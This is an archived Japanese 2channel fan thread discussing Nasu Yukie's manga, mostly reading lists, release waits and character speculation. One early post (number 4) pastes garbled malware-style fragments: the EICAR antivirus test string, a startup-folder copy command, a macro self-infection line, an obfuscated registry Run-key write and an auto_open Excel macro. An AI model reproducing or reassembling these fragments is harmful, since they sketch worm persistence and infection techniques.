5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【魔法使いの娘】那州雪絵その14【グリーンウッド】

1 :花と名無しさん:2007/11/14(水) 16:51:05 ID:???0
「ここはグリーン・ウッド」をはじめとする那州雪絵作品について語るスレです。

現在は、
・まんがライフ(毎月17日発売)の「どーする!?わんこ」
・WINGS(毎月28日発売)の「魔法使いの娘」
等で活躍中。

前スレ
【魔法使いの娘】那州雪絵その13【グリーンウッド】
http://anime2.2ch.net/test/read.cgi/gcomic/1165495423

過去ログは>>2-5のあたり

2 :花と名無しさん:2007/11/14(水) 16:55:28 ID:???0
●過去ログ
ここはグリーン・ウッド
http://salad.2ch.net/gcomic/kako/977/977349537.html
ここはグリーンウッド その2。
http://salad.2ch.net/gcomic/kako/988/988614883.html
ここはグリーンウッド その3
http://comic.2ch.net/gcomic/kako/1001/10018/1001855760.html
ここはグリーンウッド その4。
http://comic.2ch.net/gcomic/kako/1035/10359/1035946825.html
那州雪絵「ここはグリーン・ウッド」
http://comic.2ch.net/test/read.cgi/gcomic/1038666470/ (dat落ち)
【那州】 ここはグリーンウッド 【雪絵】
http://comic2.2ch.net/test/read.cgi/gcomic/1063308670/ (dat落ち)
【那州】 ここはグリーンウッド その7 【雪絵】
http://makimo.to/2ch/comic4_gcomic/1079/1079902701.html (にくちゃんねる)
http://comic4.2ch.net/test/read.cgi/gcomic/1079902701/ (dat落ち)
【那州】ここはグリーンウッド その8【雪絵】
http://comic6.2ch.net/test/read.cgi/gcomic/1086866343/
【那州】ここはグリーンウッド その9【雪絵】
http://makimo.to/2ch/comic6_gcomic/1104/1104309940.html (にくちゃんねる)
http://comic6.2ch.net/test/read.cgi/gcomic/1104309940/ (dat落ち)
【魔法使い】那州雪絵 その10【グリーンウッド】
http://makimo.to/2ch/comic6_gcomic/1113/1113912302.html (にくちゃんねる)
http://comic6.2ch.net/test/read.cgi/gcomic/1113912302/ (dat落ち)
【魔法使いの娘】那州雪絵 その11【グリーンウッド】
http://comic6.2ch.net/test/read.cgi/gcomic/1130936536/ (dat落ち)
【魔法使いの娘】那州雪絵その12【グリーンウッド】
http://comic6.2ch.net/test/read.cgi/gcomic/1146989878/

※にくちゃんねるは2006/12/31で停止予定

3 :花と名無しさん:2007/11/14(水) 17:42:38 ID:???0
≪単行本リスト≫
代表作「ここはグリーン・ウッド」
(略称GW…花ゆめコミクス:全11巻/愛蔵版:全4巻/白泉社文庫版:全6巻)

白泉社
・フラワー=デストロイヤー(花ゆめコミクス/文庫版:どちらも全1巻)
・妖魔襲来!復讐鬼(花ゆめコミクス全1巻、短編集)
・天使とダイヤモンド(花ゆめコミクス全2巻/文庫版全1巻)
・ダーク・エイジ(花ゆめコミクス全1巻)
・それからどしたの?仔猫ちゃん(花ゆめコミクス/文庫版:どちらも全1巻)
・月光(花ゆめコミクス全5巻)
・イリュージョン・フードマスター(花ゆめコミクス全1巻)
・嵐が原(ジェッツコミックス全1巻)
新書館
・魔法使いの娘(新書館Wingsコミクス、既刊5巻−以下続刊)
・暁に哭く、風に鳴くコラール(ディアプラスコミックス全一巻)
・東京怪談new(ディアプラスコミックス全一巻)
・間違いの恋(ディアプラスコミックス全一巻)
・夜明け前、僕らは…(ディアプラスコミックス全一巻)
竹書房
・どーする!?わんこ(竹書房、既刊1巻−続刊と予想)
単行本未収録作品
・ぽんこつチューンナップ(白泉社、PUTAO)(エッセイ漫画)
・俺(オイラ)には向かない職業(白泉社、花丸漫画・コミック花丸)(注・原作が那州さん、作画は別の方)

※ディアプラスコミックスはBLレーベルです。苦手な方はご注意ください。

4 :花と名無しさん:2007/11/14(水) 18:58:54 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2007/11/14(水) 20:46:42 ID:???0
>>1乙がついてるよ!

6 :花と名無しさん:2007/11/14(水) 22:31:30 ID:???0
1乙!
ここは即死ってないんだっけ?

7 :花と名無しさん:2007/11/14(水) 22:31:40 ID:???0
即死回避って何レスだっけ?20?

8 :花と名無しさん:2007/11/14(水) 22:35:58 ID:???0
>>1&前スレ>>998
乙彼です。


この話題ひっぱるのはマズいかも知れないが、
どうしても一言。

前スレ>>999
>所詮はBL
自分はBL作品は、基本的に好きではないし、あまり読んだことないけど
「所詮」って言う風にひとくくりはイクナイとオモ。
元々、少女漫画の一分野として大きくなって分派したものだし
少女漫画の中にも質の良し悪しがあるのと同様に
BLの中にも色々あると思っている。前スレの>>989に同意だ。

9 :花と名無しさん:2007/11/14(水) 22:41:20 ID:???0
やっぱ即死あるのか
今人いないみたいだから大丈夫かな…

10 :花と名無しさん:2007/11/14(水) 22:45:02 ID:???0
白泉のメロディとかそれ系(あいまいでごめん)に載ってた
やたら鼻が利く女の人が主人公の話は単行本に収録されてたっけ?

11 :花と名無しさん:2007/11/14(水) 22:52:34 ID:???0
>10
どれか忘れちゃったけど文庫に入ってる。
自分はこの作品知らなくて、文庫買ったら読んだ事ない話が入っててお得な気分になったw

12 :花と名無しさん:2007/11/14(水) 22:56:36 ID:???0
>>10
文庫版『それからどしたの?仔猫ちゃん』で再読しておくんなまし

13 :花と名無しさん:2007/11/14(水) 23:18:33 ID:???O
>>1乙鰈
前スレで「ナカグロ付けて欲しい」と希望した者です
アリガトン!

         *、 *、      。*゜    *-+。・+。-*。+。*
        / ゜+、 ゜+、   *゜ ・゜    \       。*゜
       ∩    *。  *。    +゜    ∩    *
   (´.ω.`)      +。   +。   ゜*     (´.ω.`)
   と   ノ      *゜  *゜    ・     。ヽ、  つ
    と、ノ     ・゜  ・゜     +゜    *  ヽ、 ⊃
     ~∪    *゜  *゜      *    +゜    ∪~   ☆
          +′ +′      +゜   ゜+。*。・+。-*。+。*゜


14 :13:2007/11/14(水) 23:20:32 ID:???O
ガーン…
乙AAズレた…orz

15 :花と名無しさん:2007/11/14(水) 23:24:58 ID:???0
>>8
あんまり相手にしてやるなよ
「所詮」そういう読み方しか出来ない奴なんだからさ

俺らは受け取り手として、ジャンルかかわらず
いいものはいいものとして受け止めるべく
一生懸命読むだけ それでいいじゃん

話題ひっぱってスマソ

16 :花と名無しさん:2007/11/14(水) 23:29:47 ID:???0
コラール、話は微妙だと思ったのに、雰囲気は好きだったんだよなー。暗さがいいのかも。

17 :花と名無しさん:2007/11/15(木) 01:13:07 ID:???0
>>1

魔法使いの次巻いつかな、待ち遠しいよ〜

18 :花と名無しさん:2007/11/15(木) 03:31:30 ID:???0
来年でしょうね…

19 :花と名無しさん:2007/11/15(木) 04:40:55 ID:???0
わんこの新刊も待ってるよ。

20 :花と名無しさん:2007/11/15(木) 08:06:43 ID:???0
>>16
雰囲気はよかったねー。だから余計話がアレ?なのがもったいないというか。

21 :花と名無しさん:2007/11/15(木) 09:25:33 ID:???0
わんこ新刊は来年出るのかな。楽しみ。

22 :花と名無しさん:2007/11/15(木) 09:51:14 ID:???0
>>20
「イメージ的にこんな作品が描きたいなー」みたいな段階のまま
実際に描いちゃった感じなんだよね、惜しい

23 :花と名無しさん:2007/11/15(木) 11:06:02 ID:???0
コラール、現代版の読み切りとか読んでみたいなー。
西部から大戦、恐慌など経て現代のオタクジャパンでダラダラ暮らしてて欲しい

24 :花と名無しさん:2007/11/15(木) 11:32:15 ID:???0
那州さんの暗めの話って雰囲気いいんだよね
君の見ていた夢を…とか雪女のやつとか好きだったな

25 :花と名無しさん:2007/11/15(木) 12:48:21 ID:???0
        *、 *、      。*゚    *-+。・+。-*。+。*
        / ゚+、 ゚+、   *゚ ・゚    \       。*゚
       ∩    *。  *。    +゚    ∩    *
   (´・ω・`)      +。   +。   ゚*     (´・ω・`)
   と   ノ      *゚  *゚    ・     。ヽ、  つ
    と、ノ     ・゚  ・゚     +゚    *  ヽ、 ⊃
     ~∪    *゚  *゚      *    +゚    ∪~   ☆
          +′ +′      +゚   ゚+。*。・+。-*。+。*゚

26 :25:2007/11/15(木) 13:21:44 ID:???0
>>13の代わりに入れといた、念のため。

27 :14:2007/11/16(金) 22:01:35 ID:???O
>>25
13=>>14です
わざわざ貼り直しどうもでした

28 :花と名無しさん:2007/11/16(金) 22:08:56 ID:3odirM5xO
月光買いました!本当に、今読んでも面白いですよね。紙が随分黄ばんでたのが…文庫でも出てるのですか?

29 :花と名無しさん:2007/11/16(金) 22:12:14 ID:???0
せっかく新たに>>3を設けたというのに、それはちょっとあんまりなんじゃないの。

30 :花と名無しさん:2007/11/16(金) 22:28:01 ID:3odirM5xO
文庫版が出ているのかなと思い、質問しました。ちなみに私は花ゆめコミックスを買いました。

31 :花と名無しさん:2007/11/16(金) 23:03:39 ID:???0
>>30
本当に>>3読んだの?

32 :花と名無しさん:2007/11/17(土) 00:43:40 ID:???0
ゆとり教育の凄まじさを垣間見たなぁ…
「文庫版はありません」と明記しないとわからないってか?
つか密林でも紀伊国屋ででも検索してみりゃいいじゃないの。


33 :花と名無しさん:2007/11/17(土) 01:12:31 ID:???O
まあまあ、そんないじわるな事いいなさんな。まったりいこうぜ

34 :花と名無しさん:2007/11/17(土) 12:47:24 ID:???0
ID:3odirM5xOのおかげで
ここはageるとIDがでるんだということに、たった今気がついたよ。

35 :花と名無しさん:2007/11/17(土) 13:25:44 ID:???0
6巻発売来年の2月かな?

36 :花と名無しさん:2007/11/17(土) 14:50:02 ID:???O
>>34
それは正解ではない。
メル欄に何も言葉を入力しないでレスすると、IDが出てきてageになる板。
メル欄にsageを入力するとageにならないが、例えばβακαと入力してレスすると
ID表記されずにageになる仕組み。

37 :花と名無しさん:2007/11/19(月) 00:21:04 ID:???0
>>36
サンクスコ。2ちゃんは奥が深いなぁ・・・
常駐は演劇・ヅカ板周辺な私。常時sageとかないとリンチが待っている・・・w

38 :花と名無しさん:2007/11/19(月) 01:01:17 ID:???O
兵庫っていつ初音が好きになったんだ?どこ読んでもキッカケがわからん・・・

39 :花と名無しさん:2007/11/19(月) 09:58:28 ID:???0
兵庫って初音が好きなの?恋愛対象になってるの??
なんか色々ありそうなんだけど。

40 :花と名無しさん:2007/11/19(月) 10:46:37 ID:???0
キッカケもなにも、好きだって確定するような表現はなかったと思うが

41 :花と名無しさん:2007/11/19(月) 12:55:43 ID:???0
>>39-40
自分は1巻の「君が大人になったらいい飲み友達になれそうな気がするね」の時点で、
すでに兵吾は初音を特別に思ってたような気がする。
もちろん勝手な憶測だけど。

那州さんってこういう微妙な行き交いを表現するのが天才的にうまいと思う。

42 :花と名無しさん:2007/11/19(月) 13:49:58 ID:???0
特別に思ってる=恋愛ではないよw

43 :花と名無しさん:2007/11/19(月) 14:09:04 ID:???0
今の所どっちでもとれる表現なんだよね。トモトモは誤解してるけど。

44 :花と名無しさん:2007/11/19(月) 20:00:25 ID:???0
処女が多いスレだな

45 :花と名無しさん:2007/11/19(月) 21:17:09 ID:???0
むしろゆとり

46 :花と名無しさん:2007/11/19(月) 22:49:41 ID:???0
トモトモの言動でなんか惑わされてる気がする。

47 :花と名無しさん:2007/11/20(火) 03:40:05 ID:???0
>>1

48 :花と名無しさん:2007/11/23(金) 06:02:53 ID:???0
ほっす

49 :花と名無しさん:2007/11/23(金) 21:14:55 ID:???0
ほっすてなんや。

50 :花と名無しさん:2007/11/23(金) 23:05:20 ID:???0
ほっす
〔払子〕獣毛や麻などを束ね、柄をつけた僧の使う法具。もと、印度で虫や塵などを払うのに用いた。
〔保守〕→〔ほっしゅ〕→〔ほっす〕
好きなほう選べ

51 :花と名無しさん:2007/11/24(土) 17:59:51 ID:???O
那州さんの絵、月光の1巻くらいが一番好きだ。今の絵描き分けがイマイチだし華がなくなった。

52 :花と名無しさん:2007/11/25(日) 13:59:50 ID:???O
絵はね‥常に安定してない感はあるよね;
でも那州さんならではの空気感があれば無問題w

53 :花と名無しさん:2007/11/25(日) 19:02:04 ID:???0
GW終わりの方のきらきらっぽい絵柄もすきだったなー。
持ち回りシンデレラみたいな企画ものって本誌では他にもあったの?
コミクス派で企画系はシンデレラしか見てないんだよな〜

54 :花と名無しさん:2007/11/25(日) 23:17:25 ID:???0
企画系というか、コミクスに収録されてない予告編がいくつか。
AKIRAごっこや洋画のコスプレなんかしてたな。

55 :花と名無しさん:2007/11/26(月) 00:21:32 ID:???O
そういった未収録のものが入っててカラーページがカラーで印刷されてる『ここはグリーンウッド完全版』なんてのを出してくれたら即買うのになー。
コミックスは手放しちゃっていつも文庫で読み返してるんだけどちまちましてて画面の迫力に欠けるんだよね。

56 :花と名無しさん:2007/11/26(月) 00:56:57 ID:???0
那州さんは白泉と離れてだいぶ月日が経ってるし、
文庫化が流行している今となっては
メディアミックスでもない限り、カラーページを交えた大判の発行は
夢のまた夢って気がする…(マジレスごめんね)。

57 :花と名無しさん:2007/11/26(月) 00:59:05 ID:???0
愛蔵版なら口絵とかがカラーで収録されてたりするけどね。
でもやっぱりカラーページはカラーで見たかった。

58 :花と名無しさん:2007/11/26(月) 10:35:45 ID:???0
>>51
同意
月光今読んでるけど、絵柄もストーリーも傑作だよね。
まあ最近の太い絵柄にもなれてきたけどさー

59 :花と名無しさん:2007/11/26(月) 18:18:58 ID:???0
この作者ってあんまり人前に出ないよね
サイン会とかやった事あるのかな?

60 :花と名無しさん:2007/11/26(月) 22:48:00 ID:???0
漫画家ってよほど出たがりじゃなければ、
あまり人前に出ないもんだと思っていた。
大抵容姿に自信がなくて、家に篭って仕事ができるから
選んだ職業って人もいらっしゃるしね。
性コミ系コスプレ好き漫画家とか一条御大みたいな人は、別格w

61 :花と名無しさん:2007/11/27(火) 09:35:16 ID:???0
確かにサイン会はやった事無いかも。
GWの頃なら集客凄かったろうにね。

62 :花と名無しさん:2007/11/27(火) 11:59:00 ID:fAwY7kI00
人前に出たがる漫画家って自分が美人だと思ってるんだろうな
昔だと某双子姉妹とかさ、大嫌いだった

63 :花と名無しさん:2007/11/27(火) 12:36:02 ID:???O
グリーンウッド完全版欲しいとか思う男はキモいですかそうですかorz

64 :花と名無しさん:2007/11/27(火) 12:50:24 ID:???0
>>62
楠桂、大橋薫のことかーーーーーー?!
つかそのレスは流石に偏見というか醜い嫉妬に見えててしまうな

65 :花と名無しさん:2007/11/27(火) 13:07:34 ID:???0
漫画家は顔出ししないもの、っていつ頃からそういう「常識」ができたんだろな。
作家は著書に顔写真載せるのは当たり前状態なのに
漫画家は隠す人が多い…

66 :花と名無しさん:2007/11/27(火) 13:15:42 ID:???0



月光探してます。あー夜みたい


67 :花と名無しさん:2007/11/27(火) 13:16:52 ID:???0
漫画家は、なんかこう美形とか絵で描いてキラキラでー、なんてイメージと
実際の顔写真にギャップがあると良くない、って誰かが最初に思ったのかもね

68 :花と名無しさん:2007/11/27(火) 13:42:39 ID:???O
少年漫画の作者も顔出ししない人多いしね。

69 :花と名無しさん:2007/11/27(火) 13:46:11 ID:???0
美形だとかルックス評価したいんじゃなくて
単にどんな方なのか見てみたいっていうファン心理はあるよね

70 :花と名無しさん:2007/11/27(火) 13:52:57 ID:???0
ttp://www.studio-rose.com/comic/19990129/

71 :花と名無しさん:2007/11/27(火) 13:55:31 ID:???0
ttp://www.studio-rose.com/comic/19970131/

ググって見つけた。
上も合わせてどうやら野間美由紀先生のサイトの1ページ。
ここを探索すればもっと出てくるかもしれない。

72 :花と名無しさん:2007/11/27(火) 14:23:11 ID:???0
流れの引き戻しがここまで成功しないスレだとは思ってなかったから
割とショックだわ

73 :花と名無しさん:2007/11/27(火) 14:34:28 ID:???0
>>72
ちなみにどのヘンの流れに戻したいの?
自分は専ブラなのでよくわからないけど今人多杉らしいので
いつもより少ない人数で回ってると思えば
多少強引に話題を持ってこなきゃ、待ってるだけじゃ流れはかわないとオモ。

74 :花と名無しさん:2007/11/27(火) 15:06:33 ID:???0
何か加速してると思ったらどうでもいいことなのね

ところでフジミ(だっけ?)って結局
カイト(だっけ?)ではない誰かと結婚して子供作ったのか?
最後のところの時間経過がなんとなくあやふやなんだよね
わざとだろうけど

75 :花と名無しさん:2007/11/27(火) 16:42:01 ID:???0
>>63
君がキモければ俺もキモイから大丈夫だ
うちなんて小学生の頃に買った日に焼けまくってる全11巻が未だに部屋にあるし
男ファンも結構いるんじゃないかなぁ…っていうかいるといいな

76 :花と名無しさん:2007/11/27(火) 16:55:34 ID:???0
>>74
過去スレでもう語りつくしたから、再び言うことはないな

77 :花と名無しさん:2007/11/27(火) 20:06:17 ID:???O
こうしてみると西村知美ってすげー可愛いw
漫画家連中の素材+歳+外見にこだわらなさすぎもあるけどな


78 :花と名無しさん:2007/11/27(火) 20:11:47 ID:???0
芸能人だから! 元アイドルだから!>西村知美
いくらなんでも比べちゃいかん

79 :花と名無しさん:2007/11/27(火) 20:26:08 ID:???0
一条さん、西村知美とは一緒に撮られたくなかったのではないだろうか。
苦笑いしてるw

80 :花と名無しさん:2007/11/27(火) 21:12:15 ID:???0
確か那州さんが柱かなんかで、男ファンの人に蓮川、とか友達のように
呼ばれてると嬉しいって書いてた気がするので、当時から
男ファンは結構いたんでないかな

81 :花と名無しさん:2007/11/28(水) 08:52:07 ID:???0
魔夜峰央が一番美人だな

82 :花と名無しさん:2007/11/28(水) 17:25:56 ID:???0
魔法使いの娘はパパEDなのかなー?

83 :花と名無しさん:2007/11/28(水) 18:13:17 ID:???0
いくらパパとママに子供がいなかったからって…

84 :花と名無しさん:2007/11/28(水) 18:34:10 ID:???0
ママかわいいよママ

85 :花と名無しさん:2007/11/28(水) 19:16:04 ID:???0
パパいい味だよ

86 :花と名無しさん:2007/11/28(水) 20:43:15 ID:???0
パパ萌え気味なので花嫁のパパとして嘆くパパが見たいと思ってしまったり

87 :花と名無しさん:2007/11/28(水) 23:29:01 ID:???0
>>86
わかる〜

88 :花と名無しさん:2007/11/29(木) 00:08:13 ID:???0
同居していつまでも娘に世話焼かせるパパも見たい

89 :花と名無しさん:2007/11/29(木) 01:18:16 ID:???0
Wingsバレ〜。



やっぱ兵吾って初音のこと好きなんでないの…?
そんでいきなり過去の一部が明らかになって妙に悶えてしまった。
那州ゆきへのこういう構成は大好きだ。
でも最後の場面で兵吾死亡フラグが立った気がしなくもない。


90 :花と名無しさん:2007/11/29(木) 02:06:25 ID:???O
兵庫死んじゃやだ派

91 :花と名無しさん:2007/11/29(木) 04:41:49 ID:???0
何かあっても何度でも蘇ってパパのところに化けて出ていいよ兵庫
それぐらいの嫌がらせは許されるさ

92 :花と名無しさん:2007/11/29(木) 07:54:48 ID:???0
霊として永遠に側にいるという選択肢もあるな。それは厭。
初音にはホント、男の気配がないな、これから登場人物が増えるんだろうか?
今は今でさっぱりしてていいけどね。

93 :花と名無しさん:2007/11/29(木) 08:45:02 ID:???0
男の影がさっぱりないのもパパの妨害あってのことなのかなあ…
それくらいのことはしてそうだ。

94 :花と名無しさん:2007/11/29(木) 20:33:47 ID:???0
パパはいつの間に携帯使えるようになったの?
それとも初音にかけてもらったのかな…。

95 :花と名無しさん:2007/11/29(木) 21:25:15 ID:???0
パパは携帯を持っているけど携帯使って会話してるわけではないのかも。

なんとなく、最後の方で無山と敵対することになった兵吾が
今回のカエルに命を救われる展開になるのかなとか。
まんますぎるか…。


96 :花と名無しさん:2007/11/29(木) 22:37:48 ID:???0
初音が、後を継ぐとして、どんな陰陽師になるのか
あんまり想像できない。ディープな仕事は引き受けないとか・・・?
彼女の性格からして今のまんまのような気もするが、決意したらしたで変わるのかな。

97 :花と名無しさん:2007/11/29(木) 22:46:00 ID:???0
素直に後継ぎになるとは思えない

98 :花と名無しさん:2007/11/29(木) 22:48:23 ID:???0
>>96
家政婦をしながら、そこの家庭に起きる
なんかアヤシイもの関係の揉め事を解決していく

あれ、これなんて明日香(ry

99 :花と名無しさん:2007/11/29(木) 22:51:00 ID:???0
>>98
ワロス

継ぐ継がないは、いつかパパが本気で責めてくるような気がする。

100 :花と名無しさん:2007/11/30(金) 00:14:01 ID:???0
いや、パパは自分が人間よりも魔人のほうになっちゃったときに
初音に封じてもらおうとおもっているから、「大事な役割がある」んだと。

101 :花と名無しさん:2007/11/30(金) 21:06:13 ID:???0
ええー

102 :花と名無しさん:2007/11/30(金) 21:34:08 ID:???0
大事な役割=自分のこをを倒す
とか思い浮かんだけど那州さんだったらもっとひねりがありそうで…

103 :花と名無しさん:2007/12/02(日) 16:07:07 ID:???0
ママって何歳なのかわかる記述ある?

104 :花と名無しさん:2007/12/02(日) 19:27:13 ID:???O
新刊はいつ出るんだろう
早く続き読みたい(つД`)

105 :花と名無しさん:2007/12/02(日) 19:32:26 ID:???O
新刊はいつ出るんだろう
早く続き読みたい(つД`)

106 :花と名無しさん:2007/12/02(日) 21:03:07 ID:???0
モチツケ

107 :花と名無しさん:2007/12/02(日) 23:40:59 ID:???0
(つД`)


108 :花と名無しさん:2007/12/03(月) 02:37:44 ID:???0
魔法使いの娘の発刊状況

1巻:2003/09
2巻:2005/01(or 2004/12かも)
3巻:2005/10
4巻:2006/07
5巻:2007/04

厳密に言うとちょうど1年にはならないけど、1年に1回発行ぐらいの
ペースだよね。コミクス派で、どの程度のペースでウィングス掲載されてるのか
わからないんだけど、来年春ぐらいには新刊読めるかなあ?

109 :花と名無しさん:2007/12/03(月) 14:51:19 ID:???0
>>91
あっさり退治されそうwww

初音に男の影、あるとしたら教習所の男の人かなあと思った
クールに見えて結構普通な感じで可愛かったからまた出てほしいんだけど、
あれはただのその場限りの人なのかな。
親しくなって兵吾が妬いてくれたら萌えるんだけども。
でも恋愛ではなくても、小八太とかオタクさんとか
男キャラ多いよね。メインの女の子少ないね

>>80
GW1巻は、発売日に本屋で観察したらほとんど男の人が買ってたとかどこかで言ってたよね。
つーか白泉を経てるから普通に男読者の割合多そう
ウィングスまで追っかけてくる人は少ないだろうけども

110 :花と名無しさん:2007/12/03(月) 14:52:12 ID:???0
ガイシュツだったかもスマソ

111 :花と名無しさん:2007/12/04(火) 02:55:12 ID:???O
初音ちゃんは特には意識してないんだろうけど、兵吾からしたら不思議な子なんじゃないかな
殺そうとしたのにあっさりして終わったし、その後も態度が普通だし
もてる兵吾にも全くなびかなかったり、たまに危なっかしいとこがあったりで
恋愛感情ではないと思ったり。興味対象?
反対にパパが怪しいw色んな意味で大切なんだろうけどね

112 :花と名無しさん:2007/12/04(火) 03:19:32 ID:???0
自分もWingsバレ的に〜





兵吾は、初音にちょっと魅かれることもあるけど
その度にああいう風になるわけで、ハッとして自制する感じだよね
で、パパのそれは娘だと思ってるからじゃなく、もっと他の感情じゃないのか?って疑ってるんだよね

113 :花と名無しさん:2007/12/04(火) 08:24:15 ID:???0
ヲチ対象というか・・・・

114 :花と名無しさん:2007/12/04(火) 09:17:07 ID:???0
パパと初音が夫婦に見えるっていうのがあったよね。
それまで思ったこともなかったので何かの伏線??と思って
ガックリきたw
パパと初音にラブフラグ立って欲しくなかったので。

115 :花と名無しさん:2007/12/04(火) 09:24:21 ID:???0
そこはそれ、那州さんだから「え、恋愛感情なの?」と読者に思わせておいて
実はもっと深い思惑が…ってのを描いてくれると思うので期待してる。

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)